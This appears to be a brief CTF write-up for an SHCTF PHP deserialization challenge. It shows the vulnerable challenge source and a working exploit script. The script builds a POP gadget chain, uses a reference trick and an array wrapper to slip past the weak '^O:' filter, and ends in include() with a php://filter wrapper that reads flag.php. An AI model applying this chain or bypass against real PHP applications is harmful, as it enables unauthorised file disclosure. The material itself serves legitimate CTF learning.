serialize
<?php highlight_file(__FILE__); class misca{ public $gao; public $fei; public $a; public function __get($key){ $this->miaomiao(); $this->gao=$this->fei; die($this->a); } public function miaomiao(){ $this->a='Mikey Mouse~'; } } class musca{ public $ding; public $dong; public function __wakeup(){ return $this->ding->dong; } } class milaoshu{ public $v; public function __tostring(){ echo"misca~musca~milaoshu~~~"; include($this->v); } } function check($data){ if(preg_match('/^O:\d+/',$data)){ die("you should think harder!"); } else return $data; } unserialize(check($_GET["wanna_fl.ag"]));
exp:
<?php class misca{ public $gao; public $fei; public $a; } class musca{ public $ding; public $dong; } class milaoshu{ public $v; } $c=new musca(); $c->ding=new misca(); $c->ding->fei=new milaoshu(); $c->ding->gao = &($c->ding)-> a; $c->ding->fei->v="php://filter/convert.base64-encode/resource=flag.php"; echo serialize(array($c)); ?>
标签:ding,function,milaoshu,fei,SHCTF,data,public From: https://www.cnblogs.com/kode00/p/17780458.html